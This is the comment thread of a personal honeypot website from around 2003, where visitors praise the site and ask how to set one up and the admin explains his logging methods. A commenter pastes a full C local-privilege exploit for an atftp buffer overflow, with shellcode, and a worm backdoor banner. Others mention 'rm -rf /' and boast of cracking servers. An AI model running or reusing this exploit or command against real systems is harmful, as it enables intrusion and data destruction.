My honeypot

React

The react form has been deactived. Old reactions can be found below.

Anonymous

grappig :)

Anonymous

Winnie ruled !

Anonymous

Zo kunnen we zelfs chatten

stonex

Nice work, koon ;)

Jacco

Grandioos :)

SecWiz

Are you still running any pots?

26 Jan 2003
www.secwiz.com

Admin

SecWiz: At the moment the box is running FreeBSD4.7 for testing purposes, not as a honeypot. I don't know if I'll be running one anytime soon either..

However, back in November 2002 my RedHat-setup was cracked, but I didn't document that yet. Today (27th January 2003) I documented the crack a bit, so now you can read about it, it's honeypot 4.

Anonymous

can u please let me know how did u go about setting the honeypot up because i also want to do it

Admin

I will do some work on this site when I find time. That includes somewhat more info on how I set things up.

BooR

R0x tha planet !

Arithmetica

Toffe site serkie :)

Admin

Apparantly I screwed something up with this react-form. It may have been months since this thing stopped working...

I fixed it now, though..

Anonymous

what method did you use to log all the ssh passwords....

thx, jd@labgeek.net

Admin

I simply hacked ssh (the client) to save passwords to a file, a well-known way to gather passwords.

Never used that backdoored ssh, though.

You_Wish

What method is given to hackers to hacked the pc or what doors do you present to them. ie... do you give them root or shh etc..

Anonymous

how did you know what exactly commands he typed?

Arnold

Can you make some tutorial how to set up honeypot home? please

Admin

I see there are quite some questions.. I will add a FAQ-section where I'll answer them soon...

Anonymous

Very nice of you...And reading the honeyspots was realy enjoying :)
But those kiddies was good on hack, pretty good :)

Anonymous

When will you set up FAQ , abaout Setting Up honeyd

Anonymous

yes, when?

Admin

At the moment I'm quite busy with some other projects, but I'll get back to it ASAP. Anyway, there's some info under 'setup', already.

Doom

How are you doin..You hacked the "apache" ssh ...and that..so when ppl is hacking you, you see all what are they doin...

THat is only what i need , and i need to set outgoin connection to 1kb/s so he cannot do something stupid.. :) But Hope You put some Tutorial how you did..

Anonymous

what happend?

acidstorm

get us a new irix rootkit!

Anonymous

waitin for the FAQ :D

Admin

Yeah, I really should be doing some work on this site. Bit busy with graduation, though..

PITYFUL Anonymous

all of you suck! COME ON COME HACK MY SYSTEM!

Admin

Now THAT was a smart remark, PITYFUL Anonymous.. You'd better spend your timing learning stuff, for instance about security, than calling other people names..

About updating the site: I'll get to it pretty soon now, I hope. Been doing some work on my personal site; if that's done I'll get my hands dirty on this one :)

F4steddie

Hi, Greetings for the good job!
I'm really interested on the ssh hack.. hope to see the c0de soon =)

honeydrippin

excellent site n work !

Anonymous

Nice site.....i just wanna say it that your site it's very interesting...
keep up the good work ..and DO have a LOT OF FUN

lexxor

really good analyzes i enjoyed your site.

MariusM

Three from those hackers were romanian :D Except the Italian one :D

Zwiebeltuete

This is the TV-way of honeypots. Just sit back, relax and let you entertain by nicely presented attacks. Thank you.

It is also interesting to see the different ways unix and ms computers are hacked. ms seems to be more interesting for worms because of the huge installation base (something like "critical mass for a chain reaction" comes to mind) and unix computers seem to be more interesting for doing some real "work".

Mahlzeit

Osama

good work!

Osama

good work!

BuggiBUG

but you are HACKed :))

AllWanted

## Trying to identify hosts
# Done! completed in 120 seconds
#---------------------------------------------------------------
# AllWanted's wurm back door - part of original AllWanted's wurm.
# by AllWanted, root@AllWanted.Org
# starting backdoor on port 1111, pid = 29940
# >>> Game Over Al|Wanted Win <<<
# You Are in: xx.xxx.xx.xx
sh-2.05a$ w
4:48am up 748 days, 11:54, 0 users, load average: 0.38, 0.33, 0.34
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
sh-2.05a$
sh-2.05a$

AllWanted

####### Local Explit By Al|Wanted tested on redhat 7.3 #######
/*
* atftp.0.5
* atftp.0.6 - local proof of concept exploit
* exploits an unchecked buffer in the "get file" option "-g"
*
* return addr tested on redhat 7.3 - 0xbffffbcc
* change for other systems - ./k3 <offset>
*
* Netric Security(RESOURCE MATERIAL)
* http://www.AllWanted.org
* written by Al|Wanted
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define EGG 1024
#define BUFLEN (356+9)
#define NOP 0x90
/* eSDee's execve /bin/sh shellcode */
char shellcode[] =
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80"; // int $0x80

int main(int argc, char **argv[])
{
unsigned long ret = 0xbffffbcc;
char buf[BUFLEN];
char egg[EGG];
int c;
char *ptr;
long *ptr2;
int i=0;

if(argc>1) {
ret = ret - atol(argv[1]);
}
memset(buf,NOP,sizeof(buf));
ptr=egg;
for (i=0; i<1024-strlen(shellcode)-1;i++)*(ptr++) = '\x90';
for (i=0; i<strlen(shellcode);i++)*(ptr++) = shellcode[i];
egg[1024-1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);

ptr2 = buf;
for(c = 0; c < sizeof(buf); c+=4)
*(ptr2++) = ret;

fprintf(stdout,"------------------------------------------------(www.netric.org)\n");
fprintf(stdout," local atftp-0.x proof of concept exploit\n");
fprintf(stdout,"(sacrine)-------------------------------------------------------\n\n");
fprintf(stdout,"return addr: 0x%x\n",ret);
fprintf(stdout,"buffer : %d\n\n",strlen(buf));

execl("atftp", "atftp","-g",buf, NULL);

return(0);

}

Anonymous(for now)

Hey...How did you monitored blackhat's activity?
Please contact me at wsergios@hotmail.com
(I will install a vulnerable red hat linux..and i want to install a 'honeypot')

Elemental...

Nice...

AllWanted

But You Are Hacked :o)))

Admin

AllWanted: what's up with posting exploits here? Not really useful imo..

Anonymous(for now): I monitored activity by having a hacked bash version, which logged all activity to file. See the 'setup' section for more info :)

Anonymous

Cool.

I am doing a paper on tracking hackers, I want to use some of your data under Hacks and I would like to talk to you.

Please e-mail me at majnam2002@hotmail.com

Thanks,

John

Anonymous

Ok now what are you going to do since you found some hackers on your system that aren't authorized to be there?

Did you contact their ISP? Got their name? Pressed charges? etc?

Illegal hacking activities would cease if everyone started reporting it. And if the authorities would pursue people.

I missed that critical FTP check box in IIS and had kids from France uploading/downloading music in just a couple of days. I found them by noticing the increased activity on the network.

Admin

Well, in most cases, pressing charges just doesn't work. It's -very- if not -extremely- hard to prove 'hacking' in a court of law. At least in The Netherlands it's almost impossible to get anyone convicted for `cybercrime', and in some countries there aren't even laws against this type of criminal activity, so pressing charges there is even more useless.

With regards to honeypots, they are not intended to 'take on' crackers. Their primary focus is on research. In some cases I did try to get some background information on the attackers, but not to report them to their ISPs. In general, that doesn't work too well either. They may be shut off from the net for a while, but it doesn't stop them.

Conclusion: in general, it's best to secure yourself as much as possible. After intrusions have taken place, you can -try- to do something against the attacker(s), but don't expect too much..

Maple

Just passing through when i was looking for information on Honeypots and i found this site. I like how you explain what they (the kiddies) were doing and how you monitored their actions. I especially like the way you went and followed the trail back to their computers. It's Sept. 30 2004 and it looks like this hasn't been updated in a while but i was wondering how i would edit stuff like ssh and ftp to save the passwords of hackers? Anyway, good, informative work.

Anonymous

no se ni como llegue a esta pagina pero es divertida

Anonymous

BUT YOU ARE HACKED ! :o)

Angelhappy

nic work guy .. but put an question to you if any cracker or hacker type this command on your server \"rm -fr * / \" if he has 0 uid?

Angelhappy

on google you will find a lot of xploits who can crack or hack your server . there is a lot of kind`s of xploit for any kind of linux version. you can install your honeypot on your server ... but someone who know`s that thing maby will crack your server and delete all of your thing from it!and then what to do??? look at monitor and cry! :)

Angelhappy

let me tell you something... i am from romania , i hacked server, i use to make eddrop or psybnc for me or for others.let me tell you about how an hacker thinks :
1. first are hackers who hack for stupid psybnc or eggdrop or emech, this are stupid`s one
2. second there are hackers who are making money with your server , like .. the make sales on ebay or amazon... they put their script on /var/www/html .. or where is the web server installed . they put their scripts to full the customers from ebay or amazon.After they put the scripts on your server they send e-mail`s ...like 10.000 e-mail per 20 minutes! from your server
3.there are hackers who like to hack .. they made an passion for this and thet are maniacs on this!
And there is a lot to say to you but .. nevermind

Angelhappy

if you have some quiestion i will ask you , send me an e-mail at angelhapy18@yahoo.com !

Admin

A cracker may indeed run a 'rm -rf /' on the system. If so, too bad: a reinstall is needed. It hasn't happened so far on my systems, but it is possible.

With regards to spam/mails from the honeypot: outgoing traffic was severely limited, so outgoing mail wouldn't get anywhere, at least not at high rates.

So, if you just stay in control and watch what's happening, there shouldn't be too much problems with running such a high-interactive honeypot..

Anonymous

dadadadadada

Angelhappy

:) true .. maby you will stay to watch what is doing there .. but you don`t know never what is doing :) so secure your server :)

Admin

Angelhappy: No, securing a honeypot is foolish, a honeypot is -meant- to be insecure, so crackers can be monitored. That's their purpose in life :)

Check out http://www.honeynet.org for more information :)

Angelhappy

i check that allready .. but it`s better to secure your server .. if all the admins will secure their servers no hacker can crack their server .. so we will have an few hackers .. how`s that?

Angelhappy

i crack a lot of servers too .. specialy *.edu servers .. i hacked an router from NASA .. but nothing to do on it .. only 2 comands .. help and exit :) .. the servers are secured .. but not enough .. i am tired to secure servers from the hackers.. i want to see how can this honeypot works !

Admin

Well, honeypots help in combatting crackers, since they let admins gain insight into what exploits crackers use, what they do after breaking in, etc. etc. So even an insecure system can actually help security.

Bebino

Sa Va Iau La Pola

Angelhappy

sa-i iau si eu dar ... ma cam interseaza cazul asta :)

Admin

Removed some (Romanian) swearing.

Al3x

Hi man, real nice what u did here. Two of the guys are romanian (Master and that Microbul dude), I know that, since I'm one too (and I might add that the hacker-culture is very popular in Romania). Coincidence that the IP that Master-On was using comes straight from my home town, in some Internet-Cafe (don't really know if it still exists) and that shared stuff on his comp...well, what could one expect...at that time he was prob running win98 so everyone was sharing and sharing...

Anyway, this is to be appreciated (the potting I mean :-) ). Keep it on!

Angelhappy

hmm Mr Admin.. can you send me an e-mail at angelhapy18@yahoo.com? i want to talk with you something can youdo that?thank you

lam

need one PC :(

alika

LoooL

Anonymous

Pici

Auf

Anonymous_ana

gd work! it will be better if u posted a detailed version on how u create the whole honeypot project. For ppl like myself who knows absolutely nothing about honeypot, bt i do want to implement one!

sammyb

ni poa sana!

Anon

Interesting project

Good work

Anonymous

But you are hacked :P

Anonymous

can you explane how to install honeypot using linux red hat 9